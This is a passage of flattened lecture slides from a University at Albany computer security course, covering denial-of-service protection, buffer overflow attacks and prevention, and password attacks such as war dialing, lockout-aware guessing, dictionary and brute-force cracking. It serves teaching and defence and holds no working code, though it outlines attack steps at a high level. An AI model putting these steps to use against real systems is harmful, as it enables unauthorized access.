where machines are crashed Run the least amount of services Limits
the options of the hacker Allow only necessary traffic Prevents
hacked machines to be used as launching pads Block IP addresses
Once under attack start blocking IP-addresses at the firewall DOS
Attack - Protection
Slide 64
Sanjay Goel, School of Business, University at Albany 64 This
attack t akes advantage of the way in which information is stored
by computer programs An attacker tries to store more information on
the stack than the size of the buffer How does it work? Buffer
Overflow Attacks Buffer 2 Local Variable 2 Buffer 1 Local Variable
1 Return Pointer Function Call Arguments Fill Direction Bottom of
Memory Top of Memory Normal Stack Buffer 2 Local Variable 2 Machine
Code: execve(/bin/sh) New Pointer to Exec Code Function Call
Arguments Fill Direction Bottom of Memory Top of Memory Smashed
Stack Return Pointer Overwritten Buffer 1 Space Overwritten
Slide 65
Sanjay Goel, School of Business, University at Albany 65
Programs which do not have a rigorous memory check in the code, are
vulnerable to this attack Simple weaknesses can be exploited If
memory allocated for name is 50 characters, someone can break the
system by sending a fictitious name of more than 50 characters Can
be used for espionage, denial of service or compromising the
integrity of the data Examples NetMeeting Buffer Overflow Outlook
Buffer Overflow AOL Instant Messenger Buffer Overflow SQL Server
2000 Extended Stored Procedure Buffer Overflow Buffer Overflow
Attacks
Slide 66
Sanjay Goel, School of Business, University at Albany 66 Close
port or service Remove vulnerable software Remove software no
longer being used Apply vendor patch Update patches as soon as the
vendor releases it Filter specific traffic at the firewall Once
application is identified stop all requests to it Test Key
Applications Test software for vulnerabilities Run software in the
least privilege required Limits the exploitation capacity of the
hacker Buffer Overflow Attacks - Prevention
Slide 67
Sanjay Goel, School of Business, University at Albany 67 A
hacker can exploit a weak passwords & uncontrolled network
modems easily Steps Hacker gets the phone number of a company
Hacker runs war dialer program If original number is 555-5532 he
runs all numbers in the 555-55xx range When modem answers he
records the phone number of modem Hacker now needs a user id and
password to enter company network Companies often have default
accounts e.g. temp, anonymous with no password Often the root
account uses company name as the password For strong passwords
password cracking techniques exist Password Attacks
Slide 68
Sanjay Goel, School of Business, University at Albany 68
Password hashed and stored Salt is added to randomize the password
and then stored on the system Password attacks launched to crack
encrypted password Password Security Hash Function Hashed Password
Salt Compare Password Client Password Server Stored Password Hashed
Password Allow/Deny Access
Slide 69
Sanjay Goel, School of Business, University at Albany 69 Find a
valid user ID Create a list of possible passwords Rank the
passwords from high probability to low Type in each password If the
system allows you in success ! If not, try again, being careful not
to exceed password lockout (the number of times you can guess a
wrong password before the system shuts down and wont let you try
any more) Password Attacks - Process
Slide 70
Sanjay Goel, School of Business, University at Albany 70
Dictionary Attack Hacker tries all words in dictionary to crack
password 70% of the people use dictionary words as passwords Brute
Force Attack Try all permutations of the letters & symbols in
the alphabet Hybrid Attack Words from dictionary and their
variations used in attack Social Engineering People write passwords
in different places People disclose passwords naively to others
Shoulder Surfing Hackers slyly watch over peoples shoulders to
steal passwords Dumpster Diving People dump their trash papers in
garbage which may contain information to crack passwords Password
Attacks - Types
Slide 71
Sanjay Goel, School of Business, University at Albany 71
Computer Security is a continuous battle As computer security gets
tighter hackers are getting smarter Very high stakes Billions of
dollars worth of business conducted on the internet
Conclusions